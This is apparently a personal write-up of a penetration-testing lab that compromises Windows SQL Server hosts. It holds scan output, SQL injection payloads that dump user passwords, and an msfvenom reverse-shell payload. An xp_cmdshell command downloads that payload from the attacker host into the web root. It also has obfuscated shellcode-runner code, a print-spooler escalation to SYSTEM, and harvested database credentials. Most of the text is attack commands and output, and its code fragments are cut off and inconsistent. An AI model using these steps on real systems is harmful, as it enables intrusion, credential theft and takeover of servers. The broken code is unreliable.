Lab 2
Lab 2
140
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| ASPSESSIONIDCCTQQRBR:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Music Inventory
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-02-07T09:11:12
|_Not valid after: 2051-02-07T09:11:12
|_ssl-date: 2021-02-07T09:43:54+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-07T09:43:49+00:00
| ssl-cert: Subject: commonName=sql11
| Not valid before: 2021-02-06T09:10:35
|_Not valid after: 2021-08-08T09:10:35
|_ssl-date: 2021-02-07T09:43:54+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
192.168.X.141
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-02-07T09:11:56
|_Not valid after: 2051-02-07T09:11:56
|_ssl-date: 2021-02-07T09:46:13+00:00; -25s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-07T09:46:07+00:00
| ssl-cert: Subject: commonName=sql27
| Not valid before: 2021-02-06T09:11:18
|_Not valid after: 2021-08-08T09:11:18
|_ssl-date: 2021-02-07T09:46:13+00:00; -25s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
192.168.X.142
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: SQL53
| NetBIOS_Domain_Name: SQL53
| NetBIOS_Computer_Name: SQL53
| DNS_Domain_Name: sql53
| DNS_Computer_Name: sql53
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-02-07T09:11:06
|_Not valid after: 2051-02-07T09:11:06
|_ssl-date: 2021-02-07T10:11:14+00:00; -51s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL53
| NetBIOS_Domain_Name: SQL53
| NetBIOS_Computer_Name: SQL53
| DNS_Domain_Name: sql53
| DNS_Computer_Name: sql53
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-07T10:11:11+00:00
| ssl-cert: Subject: commonName=sql53
| Not valid before: 2021-02-06T09:10:30
|_Not valid after: 2021-08-08T09:10:30
|_ssl-date: 2021-02-07T10:11:14+00:00; -51s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Then we find out that it’s the first column that is vulnerable:
' union select @@version,2; --
Gives: Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright
(C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard 10.0
(Build 17763: ) (Hypervisor)
' union select name,2 from syscolumns WHERE id = (SELECT id FROM sysobjects WHERE
name = 'users')-- gives:
Song name: id - From the year: 2
Song name: name - From the year: 2
Song name: pass - From the year: 2
So we have:
Admin:123pass123
Alice:dfdg34fdsf3
Brett:mypassword
Eric:mypassword
Peter:password
Tried some powershell reverse shell with amsi but doesn’t work. Maybe constrained language
mode is blocking me
Then I can upload an aspx file to webroot and go and trigger it, so we do:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f aspx
-o 3.aspx
Then I open aspx and add encryption to it. So we first use this caesar encrypt helper:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace CaesarEncrypt
{
class Program
{
static void Main(string[] args)
{
byte[] buf = new byte[685] {shellcodeHere };
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32
flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr
lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
Then we add the decryption routine of the caesar after the encrypted shellcode.
Then we run:
'; EXEC master.dbo.xp_cmdshell "powershell.exe iwr -uri http://192.168.X.Y/3.aspx -o
C:\inetpub\wwwroot\3.aspx";--
Then to trigger it, we go to: http://192.168.X.140/2.aspx
To priv esc, I need an exe that can give an msf. So let’s create this:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace gimmeshell
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint
flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr
lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
return xored;
}
}
}
}
c:\windows\tasks\Print.exe \\.\pipe\test\pipe\spoolss
Then Ctrl+Z
Then in meterpreter, type shell to get into a new channel
Then run: c:\windows\tasks\SpoolSample.exe sql11 sql11/pipe/tests
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
Then Ctrl+z
Then channel -i 4 (this was the channel id when we did ctrl+z above)
Then we see:
Found sid S-1-5-18
Impersonated user is: NT AUTHORITY\SYSTEM
more c:\users\administrator\desktop\proof.txt
59f136d2fd6f609a3c3e3698b51e0524 (admin on SLQ11 machine)
In loginform.asp, we find:
ConnString="DRIVER={SQL
Server};SERVER=localhost;UID=webapp11;PWD=89543dfGDFGH4d;DATABASE=music"
ComputerName : SQL11
Instance : SQL11\SQLEXPRESS
DomainName : WORKGROUP
ServiceProcessID : 3480
ServiceName : MSSQL$SQLEXPRESS
ServiceAccount : LocalSystem
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption :0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Express Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsMachineType : ServerNT
OSVersionName : Windows Server 2019 Standard
OsVersionNumber : SQL
Currentlogin : webapp11
IsSysadmin : Yes
ActiveSessions :1
Gives:
Version : SQL Server 2019
Instance : SQL11\SQLEXPRESS
CustomQuery :
Sysadmin : 1
Path : {SQL11\SQLEXPRESS}
User : webapp11
Links : {SQL27, SQL53}
Version :
Instance : Broken Link
CustomQuery :
Sysadmin :
Path : {SQL11\SQLEXPRESS, SQL27, SQL53}
User :
Links : {}
--------------------------------------------------------------------------------
43ee2d2866e4e2180b3ea72d9d10bce6
ComputerName : SQL27
Instance : SQL27\SQLEXPRESS
DomainName : WORKGROUP
ServiceProcessID : 3524
ServiceName : MSSQL$SQLEXPRESS
ServiceAccount : .\sqlsvc
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption :0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Express Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsMachineType : ServerNT
OSVersionName : Windows Server 2019 Standard
OsVersionNumber : SQL
Currentlogin : SQL27\sqlsvc
IsSysadmin : Yes
ActiveSessions :2
more proof.txt
3651616a6f9307b319311d167b19832a